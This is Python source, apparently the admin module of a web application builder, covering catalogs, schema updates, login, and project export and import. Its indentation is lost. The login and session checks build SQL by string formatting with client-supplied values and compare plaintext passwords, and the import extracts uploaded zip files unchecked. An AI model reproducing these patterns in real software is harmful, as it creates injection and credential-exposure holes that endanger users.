task.sys_languages.add_field(3, 'f_abr', 'ISO code', common.INTEGER, required=True)
task.sys_languages.add_field(4, 'f_name', 'Language', common.TEXT, required=True, size=20)
task.sys_languages.add_field(5, 'f_rtl', 'Right to left', common.BOOLEAN)
task.sys_countries = task.sys_catalogs.add_catalog('sys_countries', 'Countries', 'SYS_COUNTRIES')
task.sys_countries.add_field(1, 'id', 'ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_countries.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_countries.add_field(3, 'f_abr', 'ISO code', common.INTEGER, required=True)
task.sys_countries.add_field(4, 'f_name', 'Country', common.TEXT, required=True, size=20)
task.sys_langs.add_field(1, 'id', 'ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_langs.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_langs.add_field(3, 'f_name', 'Language', common.TEXT, required=True, size=100)
task.sys_langs.add_field(4, 'f_abr', 'ISO code', common.TEXT, visible=False, size=20)
task.sys_langs.add_field(5, 'f_language', 'Language', common.INTEGER, True, task.sys_languages, 'f_name', visible=False, enable_typeahead=True)
task.sys_langs.add_field(6, 'f_country', 'Country', common.INTEGER, True, task.sys_countries, 'f_name', visible=False, enable_typeahead=True)
task.sys_langs.add_field(7, 'f_decimal_point', 'Decimal point', common.TEXT, size=1, visible=False, edit_visible=False)
task.sys_langs.add_field(8, 'f_mon_decimal_point', 'Monetory decimal point', common.TEXT, size=1, visible=False, edit_visible=False)
task.sys_langs.add_field(9, 'f_mon_thousands_sep', 'Monetory thousands separator', common.TEXT, size=3, visible=False, edit_visible=False)
task.sys_langs.add_field(10, 'f_currency_symbol', 'Currency symbol', common.TEXT, size=10, visible=False, edit_visible=False)
task.sys_langs.add_field(11, 'f_frac_digits', 'Number of fractional digits', common.INTEGER, visible=False, edit_visible=False)
task.sys_langs.add_field(12, 'f_p_cs_precedes', 'Currency symbol precedes the value (positive values)', common.BOOLEAN, visible=False, edit_visible=False)
task.sys_langs.add_field(13, 'f_n_cs_precedes', 'Currency symbol precedes the value (negative values)', common.BOOLEAN, visible=False, edit_visible=False)
task.sys_langs.add_field(14, 'f_p_sep_by_space', 'Currency symbol is separated by a space (positive values)', common.BOOLEAN, visible=False, edit_visible=False)
task.sys_langs.add_field(15, 'f_n_sep_by_space', 'Currency symbol is separated by a space (negative values)', common.BOOLEAN, visible=False, edit_visible=False)
task.sys_langs.add_field(16, 'f_positive_sign', 'Symbol for a positive monetary value', common.TEXT, size=1, visible=False, edit_visible=False)
task.sys_langs.add_field(17, 'f_negative_sign', 'Symbol for a negative monetary value', common.TEXT, size=1, visible=False, edit_visible=False)
task.sys_langs.add_field(18, 'f_p_sign_posn', 'The position of the sign (positive values)', common.INTEGER, visible=False, edit_visible=False)
task.sys_langs.add_field(19, 'f_n_sign_posn', 'The position of the sign (negative values)', common.INTEGER, visible=False, edit_visible=False)
task.sys_langs.add_field(20, 'f_d_fmt', 'Date format string', common.TEXT, size=30, visible=False, edit_visible=False)
task.sys_langs.add_field(21, 'f_d_t_fmt', 'Date and time format string', common.TEXT, size=30, visible=False, edit_visible=False)
task.sys_langs.add_field(22, 'f_rtl', 'Right to left', common.BOOLEAN, visible=False)
task.sys_lang_keys_values = task.sys_catalogs.add_catalog('sys_lang_keys_values', 'Language values', '')
task.sys_lang_keys_values.add_field(1, 'id', 'ID', common.INTEGER, visible=True, edit_visible=False)
task.sys_lang_keys_values.add_field(2, 'deleted', 'Deleted flag', common.INTEGER, visible=False, edit_visible=False)
task.sys_lang_keys_values.add_field(3, 'f_type', 'Key type', common.INTEGER, visible=False, edit_visible=False)
task.sys_lang_keys_values.add_field(3, 'f_lang', 'Language ID', common.INTEGER, visible=False, edit_visible=False)
task.sys_lang_keys_values.add_field(4, 'f_key', 'Key', common.INTEGER, visible=False, edit_visible=False)
task.sys_lang_keys_values.add_field(5, 'f_value', 'Translation', common.TEXT, size=1048)
task.sys_lang_keys_values.add_field(6, 'f_key_str', 'Key', common.TEXT, size=1048)
task.sys_lang_keys_values.add_field(6, 'f_eng_str', 'English', common.TEXT, size=1048)
def init_item(item, id_value):
item.ID = id_value
item.soft_delete = False
item._primary_key = 'id'
item._primary_key_db_field_name = 'ID'
item._deleted_flag = 'deleted'
item._deleted_flag_db_field_name = 'DELETED'
item._master_id = ''
item._master_id_db_field_name = ''
item._master_rec_id = ''
item._master_rec_id_db_field_name = ''
if item.master:
item._master_id = 'owner_id'
item._master_id_db_field_name = 'OWNER_ID'
item._master_rec_id = 'owner_rec_id'
item._master_rec_id_db_field_name = 'OWNER_REC_ID'
item._view_list = []
item._edit_list = []
if hasattr(item, '_fields'):
for field in item._fields:
field.alignment = common.get_alignment(field.data_type, field.lookup_item, field.lookup_values)
if field.lookup_field:
field.lookup_db_field = field.lookup_field.upper()
if field.view_visible:
item._view_list.append([field.ID])
if field.edit_visible:
item._edit_list.append([field.ID])
init_item(task, 0)
init_item(task.sys_users, 1)
init_item(task.sys_roles, 2)
init_item(task.sys_items, 3)
init_item(task.sys_fields, 4)
init_item(task.sys_filters, 5)
init_item(task.item_fields, 6)
init_item(task.sys_privileges, 7)
init_item(task.role_privileges, 8)
init_item(task.sys_tasks, 9)
init_item(task.sys_indices, 10)
init_item(task.sys_params, 11)
init_item(task.sys_report_params, 12)
init_item(task.sys_code_editor, 14)
init_item(task.sys_fields_editor, 15)
init_item(task.sys_search, 16)
init_item(task.sys_field_lookups, 17)
init_item(task.sys_lookup_lists, 18)
init_item(task.sys_new_group, 19)
init_item(task.sys_languages, 20)
init_item(task.sys_countries, 21)
init_item(task.sys_langs, 22)
init_item(task.sys_lang_keys_values, 23)
task.sys_catalogs.ID = 101
task.sys_tables.ID = 102
for i in range(1, 23):
try:
item = task.item_by_ID(i)
for field in item._fields:
field_def = field.field_def
field_def[FIELD_ALIGNMENT] = field.alignment
if field.lookup_item:
field_def[LOOKUP_FIELD] = field.lookup_item._field_by_name(field.lookup_field).ID
field_def[LOOKUP_ITEM] = field.lookup_item.ID
for filter in item.filters:
if filter.field:
filter.filter_def[FILTER_FIELD_NAME] = filter.field.ID
except:
pass
def update_admin_fields(task):
def do_updates(con, field, item_name):
if item_name == 'sys_privileges' and field.field_name.lower() == 'owner_item':
cursor = con.cursor()
cursor.execute("SELECT ID FROM SYS_ITEMS WHERE TABLE_ID > 0 AND DELETED = 0")
details = cursor.fetchall()
cursor.execute("SELECT ID FROM SYS_ROLES WHERE DELETED = 0")
roles = cursor.fetchall()
for d in details:
for r in roles:
cursor.execute("""
INSERT INTO SYS_PRIVILEGES
(DELETED, OWNER_ID, OWNER_REC_ID, ITEM_ID, F_CAN_VIEW, F_CAN_CREATE, F_CAN_EDIT, F_CAN_DELETE)
values (?, ?, ?, ?, ?, ?, ?, ?)""",
(0, 2, r[0], d[0], True, True, True, True))
con.commit()
def get_item_fields(item, table_name):
cursor.execute('PRAGMA table_info(%s)' % table_name)
rows = cursor.fetchall()
result = [str(row[1]).upper() for row in rows]
return result
def check_item_fields(item, table_name=None):
if not table_name:
table_name = item.table_name.upper()
fields = get_item_fields(item, table_name)
for field in item._fields:
if not field.field_name.upper() in fields:
sql = 'ALTER TABLE %s ADD COLUMN %s %s' % \
(table_name, field.field_name.upper(), \
task.db_module.FIELD_TYPES[field.data_type])
print(sql)
cursor.execute(sql)
con.commit()
do_updates(con, field, item.item_name)
def check_table_exists(item, table_name=None):
if not table_name:
table_name = item.table_name.upper()
sql = 'SELECT name FROM sqlite_master WHERE type="table" AND UPPER(name)="%s"' % table_name
cursor.execute(sql)
rows = cursor.fetchall()
if not rows:
sql = 'CREATE TABLE %s (ID INTEGER PRIMARY KEY)' % table_name
cursor.execute(sql)
return True
con = task.create_connection()
try:
cursor = con.cursor()
for group in task.items:
for item in group.items:
if item.table_name and not item.master:
if check_table_exists(item):
check_item_fields(item)
finally:
con.close()
def delete_reports(task):
while True:
if common.SETTINGS['DELETE_REPORTS_AFTER']:
path = os.path.join(task.work_dir, 'static', 'reports')
if os.path.isdir(path):
for f in os.listdir(path):
file_name = os.path.join(path, f)
if os.path.isfile(file_name):
delta = datetime.datetime.now() - datetime.datetime.fromtimestamp(os.path.getmtime(file_name))
hours, sec = divmod(delta.total_seconds(), 3600)
if hours > common.SETTINGS['DELETE_REPORTS_AFTER']:
os.remove(file_name)
time.sleep(1)
def init_delete_reports(task):
t = threading.Thread(target=delete_reports, args=(task,))
t.daemon = True
t.start()
def read_secret_key(task):
result = None
con = task.create_connection()
try:
cursor = con.cursor()
cursor.execute('SELECT f_secret_key FROM SYS_PARAMS')
rec = cursor.fetchall()
finally:
con.rollback()
con.close()
result = rec[0][0]
if result is None:
result = ''
return result
def init_admin(task):
langs.update_langs(task)
task.set_language(read_language(task))
create_items(task)
update_admin_fields(task)
task.fields_id_lock = Lock()
read_setting(task)
task.task_con_pool_size = common.SETTINGS['CON_POOL_SIZE']
if task.task_con_pool_size < 1:
task.task_con_pool_size = 3
try:
task.task_mp_pool = common.SETTINGS['MP_POOL']
task.task_persist_con = common.SETTINGS['PERSIST_CON']
except:
task.task_mp_pool = 4
task.task_persist_con = True
task.secret_key = read_secret_key(task)
task.safe_mode = common.SETTINGS['SAFE_MODE']
task.max_content_length = common.SETTINGS['MAX_CONTENT_LENGTH']
task.timeout = common.SETTINGS['TIMEOUT']
task.ignore_change_ip = common.SETTINGS['IGNORE_CHANGE_IP']
task.ignore_change_uuid = True
task.set_language(common.SETTINGS['LANGUAGE'])
task.item_caption = task.language('admin')
register_events(task)
init_fields_next_id(task)
init_delete_reports(task)
return task
def create_admin(app):
task = AdminTask(app, 'admin', 'Administrator', '', db_modules.SQLITE, db_database='admin.sqlite')
init_admin(task)
return task
def db_info(task):
tasks = task.sys_tasks.copy()
tasks.open()
return tasks.f_db_type.value, tasks.f_server.value, tasks.f_alias.value, tasks.f_login.value, \
tasks.f_password.value, tasks.f_host.value, \
tasks.f_port.value, tasks.f_encoding.value
def execute(task, task_id, sql, params=None):
if task_id == 0:
result_set, error = task.execute(sql, params)
return error
else:
connection = None
db_type, db_server, db_database, db_user, db_password, db_host, db_port, db_encoding = db_info(task)
db_module = db_modules.get_db_module(db_type)
connection, (result_set, error) = execute_sql(db_module, \
db_server, db_database, db_user, db_password, db_host, db_port,
db_encoding, connection, sql, params)
if connection:
connection.rollback()
connection.close()
return error
def execute_ddl(task, db_sql):
connection = None
success = True
db_type, db_server, db_database, db_user, db_password, db_host, db_port, db_encoding = db_info(task)
db_module = db_modules.get_db_module(db_type)
connection, (result_set, error, info) = execute_sql(db_module, \
db_server, db_database, db_user, db_password, db_host, db_port,
db_encoding, connection, db_sql, ddl=True)
if db_module.DDL_ROLLBACK:
if error:
success = False
if connection:
connection.close()
return success, error, info
def execute_select(task_id, sql, params=None):
return task.select(sql)
def get_privileges(task, role_id):
result = {}
privliges = task.sys_privileges.copy()
privliges.filters.owner_rec_id.value = role_id
privliges.open()
for p in privliges:
result[p.item_id.value] = \
{
'can_view': p.f_can_view.value,
'can_create': p.f_can_create.value,
'can_edit': p.f_can_edit.value,
'can_delete': p.f_can_delete.value
}
return result
def get_roles(task):
privileges = {}
roles = []
r = task.sys_roles.copy()
r.open()
for r in r:
privileges[r.id.value] = get_privileges(task, r.id.value)
roles.append([r.id.value, r.f_name.value])
return roles, privileges
def login(task, log, password, admin, ip=None, session_uuid=None):
user_id = None
user_info = {}
if task.safe_mode:
users = task.sys_users.copy()
users.set_where(f_password=password)
users.open()
for u in users:
if u.f_login.value.strip() == log.strip() and u.f_password.value == password:
if not admin or u.f_admin.value == admin:
user_id = u.id.value
user_info = {
'user_id': u.id.value,
'role_id': u.f_role.value,
'role_name': u.f_role.display_text,
'user_name': u.f_name.value,
'admin': u.f_admin.value
}
if ip or session_uuid:
task.execute("UPDATE SYS_USERS SET F_IP='%s', F_UUID='%s' WHERE ID=%s" % (ip, session_uuid, u.id.value))
break
return user_info
def user_valid_ip(task, user_id, ip):
res = task.select("SELECT F_IP FROM SYS_USERS WHERE ID=%s" % user_id)
if res and res[0][0] == ip:
return True
return False
def user_valid_uuid(task, user_id, session_uuid):
res = task.select("SELECT F_UUID FROM SYS_USERS WHERE ID=%s" % user_id)
if res and res[0][0] == session_uuid:
return True
return False
def create_task(app):
result = None
task = app.admin
it = task.sys_items.copy()
it.filters.type_id.value = [common.TASK_TYPE]
it.open()
it_task = task.sys_tasks.copy()
it_task.open()
if it_task.f_db_type.value:
result = Task(app, it.f_item_name.value, it.f_name.value,
it.f_js_filename.value, it_task.f_db_type.value, it_task.f_server.value,
it_task.f_alias.value, it_task.f_login.value, it_task.f_password.value,
it_task.f_host.value, it_task.f_port.value, it_task.f_encoding.value,
task.task_con_pool_size, task.task_mp_pool, task.task_persist_con
)
result.ID = it.id.value
load_task(result, app)
else:
raise common.ProjectNotCompleted()
return result
###############################################################################
# load task #
###############################################################################
def reload_task(task):
if task.app.task:
task.app.under_maintenance = True
try:
while True:
if task.app._busy > 1:
time.sleep(0.1)
else:
break
read_setting(task)
load_task(task.app.task, task.app, first_build=False)
task.app.task.mod_count += 1
finally:
task.app.under_maintenance = False
def load_task(target, app, first_build=True, after_import=False):
def create_fields(item, parent_id):
recs = fields_dict.get(parent_id)
if recs:
for r in recs:
sys_fields.rec_no = r
if sys_fields.owner_rec_id.value == parent_id:
view_index = -1
visible = False
word_wrap = False
expand = False
editable = False
edit_visible = False
edit_index = -1
field = item.add_field(sys_fields.id.value,
sys_fields.f_field_name.value,
sys_fields.f_name.value,
sys_fields.f_data_type.value,
sys_fields.f_required.value,
sys_fields.f_object.value,
sys_fields.f_object_field.value,
visible,
view_index,
edit_visible,
edit_index,
sys_fields.f_read_only.value,
expand,
word_wrap,
sys_fields.f_size.value,
sys_fields.f_default_value.value,
sys_fields.f_default.value,
sys_fields.f_calculated.value,
editable,
sys_fields.f_master_field.value,
sys_fields.f_alignment.value,
sys_fields.f_lookup_values.value,
sys_fields.f_enable_typehead.value,
sys_fields.f_help.value,
sys_fields.f_placeholder.value,
sys_fields.f_object_field1.value,
sys_fields.f_object_field2.value,
sys_fields.f_db_field_name.value,
sys_fields.f_mask.value,
sys_fields.f_image_edit_width.value,
sys_fields.f_image_edit_height.value,
sys_fields.f_image_view_width.value,
sys_fields.f_image_view_height.value,
sys_fields.f_image_placeholder.value,
sys_fields.f_image_camera.value,
sys_fields.f_file_download_btn.value,
sys_fields.f_file_open_btn.value,
sys_fields.f_file_accept.value
)
def create_filters(item, parent_id):
for rec in sys_filters:
if sys_filters.owner_rec_id.value == parent_id:
item.add_filter(
sys_filters.f_filter_name.value,
sys_filters.f_name.value,
sys_filters.f_field.value,
sys_filters.f_type.value,
sys_filters.f_multi_select_all.value,
sys_filters.f_data_type.value,
sys_filters.f_visible.value,
sys_filters.f_help.value,
sys_filters.f_placeholder.value,
sys_filters.id.value,
)
def create_params(item, parent_id):
for params in sys_params:
if sys_params.owner_rec_id.value == parent_id:
item.add_param(params.f_name.value,
params.f_param_name.value,
params.f_data_type.value,
params.f_object.value,
params.f_object_field.value,
params.f_required.value,
params.f_visible.value,
params.f_alignment.value,
params.f_multi_select.value,
params.f_multi_select_all.value,
params.f_enable_typehead.value,
params.f_lookup_values.value,
params.f_help.value,
params.f_placeholder.value
)
def create_items(group, group_id, group_type_id):
for rec in sys_items:
if rec.parent.value == group_id:
item = None
add_item = None
if group_type_id == common.ITEMS_TYPE:
add_item = group.add_catalog
elif group_type_id == common.TABLES_TYPE:
add_item = group.add_table
elif group_type_id == common.REPORTS_TYPE:
add_item = group.add_report
if add_item:
item = add_item(rec.f_item_name.value,
rec.f_name.value,
rec.f_table_name.value,
rec.f_visible.value,
rec.f_view_template.value,
rec.f_js_filename.value,
rec.f_soft_delete.value)
if item:
item.ID = rec.id.value
item.gen_name = rec.f_gen_name.value
item.virtual_table = rec.f_virtual_table.value
item.server_code = rec.f_server_module.value
item._keep_history = rec.f_keep_history.value
item.edit_lock = rec.f_edit_lock.value
item.select_all = rec.f_select_all.value
item._primary_key = rec.f_primary_key.value
item._deleted_flag = rec.f_deleted_flag.value
item._master_id = rec.f_master_id.value
item._master_rec_id = rec.f_master_rec_id.value
item._sys_id = rec.sys_id.value
if group_type_id != common.REPORTS_TYPE:
common.load_interface(sys_items)
item._view_list = sys_items._view_list
item._edit_list = sys_items._edit_list
create_fields(item, group_id)
create_fields(item, rec.id.value)
item._order_by = sys_items._order_list
item.rep_ids = sys_items._reports_list
create_filters(item, group_id)
create_filters(item, rec.id.value)
else:
create_params(item, rec.id.value)
item.rep_ids = []
def create_groups(parent):
groups = []
for rec in sys_items:
if rec.id.value == parent:
target.table_name = rec.f_table_name.value
target.template = rec.f_view_template.value
target.js_filename = rec.f_js_filename.value
common.load_interface(sys_items)
target.server_code = rec.f_server_module.value
if rec.parent.value == parent:
group = Group(target, target, rec.f_item_name.value, rec.f_name.value, rec.f_view_template.value,
rec.f_js_filename.value, rec.f_visible.value, rec.type_id.value)
group.ID = rec.id.value
group.server_code = rec.f_server_module.value
groups.append((group, rec.id.value, rec.type_id.value))
for group in groups:
create_items(*group)
def create_details():
for it in sys_items:
if it.table_id.value:
item = target.item_by_ID(it.parent.value)
table = target.item_by_ID(it.table_id.value)
if item and table:
detail = item.add_detail(table)
detail.item_name = it.f_item_name.value
detail.ID = it.id.value
detail.gen_name = table.gen_name
detail.visible = it.f_visible.value
detail.view_template = it.f_view_template.value
detail.js_filename = it.f_js_filename.value
detail.server_code = it.f_server_module.value
detail.item_type = common.ITEM_TYPES[detail.item_type_id - 1]
common.load_interface(sys_items)
detail._view_list = sys_items._view_list
detail._edit_list = sys_items._edit_list
detail._order_by = sys_items._order_list
def process_reports():
def add_reports(item):
item.reports = []
for rep_id in item.rep_ids:
report = target.item_by_ID(rep_id[0])
if report:
item.reports.append(report)
for group in target.items:
for item in group.items:
add_reports(item)
def process_lookup_lists():
lists = task.sys_lookup_lists.copy()
lists.open(order_by=['f_name'])
for l in lists:
text = l.f_lookup_values_text.value
target.lookup_lists[l.id.value] = json.loads(l.f_lookup_values_text.value)
def remove_attr(target):
for key in list(iterkeys(target.__dict__)):
try:
value = target.init_dict[key]
if hasattr(target.__dict__[key], '__call__'):
target.__dict__[key] = value
except:
del target.__dict__[key]
def history_on_apply(item, delta, params):
raise Exception('Changing of history is not allowed.')
target.pool.dispose()
target.pool.recreate()
task = app.admin
remove_attr(target)
target.items = []
sys_fields = task.sys_fields.copy()
sys_fields.open(order_by=['id'])
fields_dict = {}
for f in sys_fields:
d = fields_dict.get(f.owner_rec_id.value, [])
if not d:
fields_dict[f.owner_rec_id.value] = d
d.append(f.rec_no)
sys_filters = task.sys_filters.copy()
sys_filters.open(order_by=['f_index'])
sys_params = task.sys_report_params.copy()
sys_params.open(order_by=['f_index'])
sys_items = task.sys_items.copy()
sys_items.details_active = False
sys_items.open(order_by=['f_index'])
create_groups(target.ID)
create_details()
process_reports()
process_lookup_lists()
target.bind_items()
target.compile_all()
target.lang = task.lang
target.locale = task.locale
params = task.sys_params.copy()
params.open(fields=['f_history_item', 'f_lock_item'])
target.history_item = None
if params.f_history_item.value:
target.history_item = target.item_by_ID(params.f_history_item.value)
target.history_item.on_apply = history_on_apply
if params.f_lock_item.value:
target.lock_item = target.item_by_ID(params.f_lock_item.value)
target.first_build = first_build
target.after_import = after_import
if target.on_created:
target.on_created(target)
sys_fields.free()
sys_filters.free()
sys_params.free()
sys_items.free()
internal_path = os.path.join(task.work_dir, 'static', '_internal')
if os.path.exists(internal_path):
try:
shutil.rmtree(internal_path)
except:
pass
#
###############################################################################
# task #
###############################################################################
def server_check_connection(task, db_type, database, user, password, host, port, encoding, server):
error = ''
if db_type:
try:
db_module = db_modules.get_db_module(db_type)
connection = db_module.connect(database, user, password, host, port, encoding, server)
if connection:
connection.close()
except Exception as e:
error = str(e)
return error
def server_set_task_name(task, f_name, f_item_name):
tasks = task.sys_tasks.copy()
tasks.open()
items = task.sys_items.copy(handlers=False)
items.set_where(type_id=common.TASK_TYPE)
items.open()
items.edit()
items.f_name.value = f_name
items.f_item_name.value = f_item_name
items.post()
items.apply()
task.app.task = None
def server_set_project_langage(task, lang):
common.SETTINGS['LANGUAGE'] = lang
task.set_language(lang)
write_setting(task)
read_setting(task)
create_items(task)
items = task.sys_items.copy()
items.open()
for it in items:
it.edit()
try:
it.f_name.value = task.language(it.f_item_name.value)
except Exception as e:
traceback.print_exc()
it.post()
it.apply()
file_name = 'index.html'
data = file_read(file_name)
start = data.find('__$_')
label_list = []
while start > -1:
end = data.find('_$__', start)
if end != -1:
search = data[start:end+4]
replace = data[start +4:end]
label_list.append((search, replace))
start = data.find('__$_', end)
for search, replace in label_list:
try:
data = data.replace(search, task.language(replace))
except:
pass
file_write(file_name, data)
register_events(task)
# ~ def server_change_secret_key(task):
# ~ from base64 import b64encode
# ~ result = False
# ~ key = b64encode(os.urandom(20)).decode('utf-8')
# ~ con = task.create_connection()
# ~ try:
# ~ cursor = con.cursor()
# ~ cursor.execute("UPDATE SYS_PARAMS SET F_SECRET_KEY='%s'" % key)
# ~ con.commit()
# ~ task.secret_key = key
# ~ task.app.task_server_modified = True
# ~ result = True
# ~ except:
# ~ con.rollback()
# ~ finally:
# ~ con.close()
# ~ return result
def server_update_has_children(task):
has_children = {}
items = task.sys_items.copy(handlers=False)
items.open()
for it in items:
has_children[it.parent.value] = True
if it.type_id.value in (common.ROOT_TYPE, common.USERS_TYPE, common.ROLES_TYPE,
common.TASKS_TYPE, common.ITEMS_TYPE,
common.TABLES_TYPE, common.REPORTS_TYPE):
has_children[it.id.value] = True
for it in items:
if not has_children.get(it.id.value):
has_children[it.id.value] = False
if it.has_children.value != has_children.get(it.id.value):
it.edit()
it.has_children.value = has_children.get(it.id.value)
it.post()
items.apply()
def server_export_task(task, task_id, url=None):
def add_item(item):
table = item.copy(handlers=False)
table.open()
fields = []
for field in table.fields:
fields.append(field.field_name)
result[item.item_name] = {'fields': fields, 'records': table.dataset}
result = {}
result['db_type'] = get_db_type(task)
add_item(task.sys_items)
add_item(task.sys_fields)
add_item(task.sys_indices)
add_item(task.sys_filters)
add_item(task.sys_report_params)
add_item(task.sys_roles)
add_item(task.sys_params)
add_item(task.sys_privileges)
add_item(task.sys_lookup_lists)
task_file = 'task.dat'
file_name = 'task.zip'
zip_file_name = os.path.join(task.work_dir, file_name)
try:
with open(task_file, 'w') as f:
json.dump(result, f)
with zipfile.ZipFile(zip_file_name, 'w', zipfile.ZIP_DEFLATED) as zip_file:
zip_file.write(task_file)
common.zip_html(zip_file)
common.zip_dir('js', zip_file)
common.zip_dir('css', zip_file)
common.zip_dir(os.path.join('static', 'img'), zip_file)
common.zip_dir(os.path.join('static', 'js'), zip_file)
common.zip_dir(os.path.join('static', 'css'), zip_file)
common.zip_dir(os.path.join('static', 'fonts'), zip_file)
common.zip_dir(os.path.join('static', 'builder'), zip_file)
common.zip_dir('utils', zip_file, exclude_ext=['.pyc'])
common.zip_dir('reports', zip_file, exclude_ext=['.xml', '.ods#'], recursive=True)
if url:
items = task.sys_items.copy()
items.set_where(id=task_id)
items.open()
result_path = os.path.join(task.work_dir, 'static', '_internal')
if not os.path.exists(result_path):
os.makedirs(result_path)
result_file = '%s_%s_%s_%s.zip' % (items.f_item_name.value, common.SETTINGS['VERSION'],
task.app.jam_version, datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"))
os.rename(to_unicode(file_name, 'utf-8'), os.path.join(to_unicode(result_path, 'utf-8'), to_unicode(result_file, 'utf-8')))
result = '%s/static/_internal/%s' % (url, result_file)
else:
result = file_read(file_name)
finally:
if os.path.exists(task_file):
os.remove(task_file)
if os.path.exists(file_name):
os.remove(file_name)
return result
def server_import_task(task, task_id, file_name, from_client=False):
return task.app.import_metadata(task, task_id, file_name, from_client)
def import_metadata(task, task_id, file_name, from_client=False):
def refresh_old_item(item):
item = item.copy(handlers=False)
item.open(expanded=False)
old_dict[item.item_name] = item
def get_dataset(item, data_lists):
ns = []
ds = []
dl = data_lists.get(item.item_name)
if dl:
field_names = data_lists[item.item_name]['fields']
dataset = data_lists[item.item_name]['records']
for d in dataset:
ds.append([])
for i, f in enumerate(field_names):
if item.field_by_name(f):
ns.append(f)
for j, d in enumerate(dataset):
ds[j].append(dataset[j][i])
else:
for f in item.fields:
ns.append(f.field_name)
return ns, ds
def get_items(dir):
file_name = os.path.join(dir, 'task.dat')
data = file_read(file_name)
data_lists = json.loads(data)
new_items = {}
old_items = {}
items = [task.sys_items, task.sys_fields, task.sys_indices, task.sys_filters, \
task.sys_report_params, task.sys_roles, task.sys_params, task.sys_privileges, \
task.sys_lookup_lists]
for item in items:
task.execute('DELETE FROM "%s" WHERE "DELETED" = 1' % item.table_name)
old_item = item.copy(handlers=False)
old_item.soft_delete = False
old_item.open(expanded=False)
field_names, dataset = get_dataset(old_item, data_lists)
new_item = item.copy(handlers=False)
new_item.open(expanded=False, fields=field_names, open_empty=True)
new_item._dataset = dataset
new_items[item.item_name] = new_item
old_items[item.item_name] = old_item
os.remove(file_name)
db_type = data_lists.get('db_type')
if not db_type:
db_type = get_db_type(task)
return new_items, old_items, db_type
def can_copy_field(field):
if field.owner.item_name == 'sys_params':
if field.field_name in ['f_safe_mode', 'f_debugging']:
return False
return True
def copy_record(old, new):
for old_field in old.fields:
if can_copy_field(old_field):
new_field = new.field_by_name(old_field.field_name)
if new_field:
old_field.value = new_field.raw_value
def compare_items(old, new, owner_id=None):
result = {}
for it in old:
result[it.id.value] = [True, False]
for it in new:
if not owner_id or owner_id == it.owner_rec_id.value:
info = result.get(it.id.value)
if info:
info[1] = True
else:
result[it.id.value] = [False, True]
return result
def check_items():
errors = []
new = new_dict['sys_items']
old = old_dict['sys_items']
compare = compare_items(old, new)
for it in old:
o, n = compare[old.id.value]
if o and n:
new.locate('id', old.id.value)
if old.type_id.value != new.type_id.value:
errors.append('Items with ID %s (<b>%s</b>, <b>%s</b>) have different type values' % \
(old.id.value, old.f_item_name.value, new.f_item_name.value))
elif old.f_table_name.value and old.f_table_name.value.upper() != new.f_table_name.value.upper():
errors.append('Items with ID %s (<b>%s</b>, <b>%s</b>) have different database tables (<b>%s</b>, <b>%s</b>)' % \
(old.id.value, old.f_item_name.value, new.f_item_name.value, old.f_table_name.value, new.f_table_name.value))
error = ",<br>".join(errors)
if error:
error = '<div class="text-error">%s</div>' % error
return error
def update_item(item_name, detail_name=None, options=['update', 'insert', 'delete'], owner=None):
new = new_dict[item_name]
if owner:
old = owner.detail_by_name(item_name)
old.open(expanded=False)
else:
old = old_dict[item_name]
owner_id = None
if owner:
owner_id = owner.id.value
compare = compare_items(old, new, owner_id)
if 'delete' in options:
old.first()
while not old.eof():
if not owner_id or owner_id == old.owner_rec_id.value:
o, n = compare[old.id.value]
if o and not n:
old.delete()
else:
old.next()
else:
old.next()
if 'update' in options:
for it in old:
if not owner_id or owner_id == it.owner_rec_id.value:
o, n = compare[old.id.value]
if o and n and new.locate('id', old.id.value):
old.edit()
copy_record(old, new)
if detail_name:
update_item(detail_name, owner=old)
old.post()
if 'insert' in options:
for it in new:
if not owner_id or owner_id == it.owner_rec_id.value:
o, n = compare[new.id.value]
if not o and n:
old.append()
copy_record(old, new)
if detail_name:
update_item(detail_name, owner=old)
old.post()
return old
def get_delta(item_name, detail_name=None, options=['update', 'insert', 'delete']):
item = update_item(item_name, detail_name, options)
return item.delta()
def get_new_fields(item_id):
result = []
new_items = new_dict['sys_items']
if new_items.locate('id', item_id):
parent_id = new_items.parent.value
new_fields = new_dict['sys_fields']
for field in new_fields:
if field.owner_rec_id.value in [item_id, parent_id]:
if not (field.f_calculated.value or field.f_master_field.value):
dic = {}
dic['id'] = field.id.value
dic['field_name'] = field.f_db_field_name.value
dic['data_type'] = field.f_data_type.value
dic['size'] = field.f_size.value
dic['default_value'] = ''#field.f_default_value.value
dic['primary_key'] = field.id.value == new_items.f_primary_key.value
result.append(dic)
return result
def get_table_name(item_id):
new_items = new_dict['sys_items']
if new_items.locate('id', item_id):
if not new_items.f_virtual_table.value:
return new_items.f_table_name.value
def copy_tmp_files(zip_file_name):
dir = os.path.join(os.getcwd(), 'tmp-' + datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"))
if os.path.exists(dir):
shutil.rmtree(dir)
os.makedirs(dir)
with zipfile.ZipFile(zip_file_name) as z:
z.extractall(dir)
return dir
def delete_tmp_files(dir):
if os.path.exists(dir):
shutil.rmtree(dir)
def copy_files(dir):
from distutils import dir_util
dir_util.copy_tree(dir, os.getcwd())
def get_foreign_key_dict(ind):
dic = None
if ind.f_foreign_index.value:
dic = {}
fields = new_dict['sys_fields']
fields.locate('id', ind.f_foreign_field.value)
dic['key'] = fields.f_db_field_name.value
ref_id = fields.f_object.value
items = new_dict['sys_items']
items.locate('id', ref_id)
dic['ref'] = items.f_table_name.value
primary_key = items.f_primary_key.value
fields.locate('id', primary_key)
dic['primary_key'] = fields.f_db_field_name.value
return dic
def check_generator(item, delta):
db_type = get_db_type(item.task)
db_module = db_modules.get_db_module(db_type)
for d in delta:
if d.rec_inserted() and db_module.NEED_GENERATOR and \
d.f_primary_key.value and not d.f_gen_name.value:
d.edit()
d.f_gen_name.value = '%s_SEQ' % d.f_table_name.value
d.post()
def update_indexes(new_dict, new_db_type, old_db_type):
if new_db_type == db_modules.FIREBIRD or old_db_type == db_modules.FIREBIRD:
item = new_dict['sys_indices']
for it in item:
if it.f_fields_list.value:
field_list = common.load_index_fields(it.f_fields_list.value)
desc = it.descending.value
if field_list:
it.edit()
if new_db_type == db_modules.FIREBIRD:
l = []
for f in field_list:
l.append([f[0], desc])
field_list = l
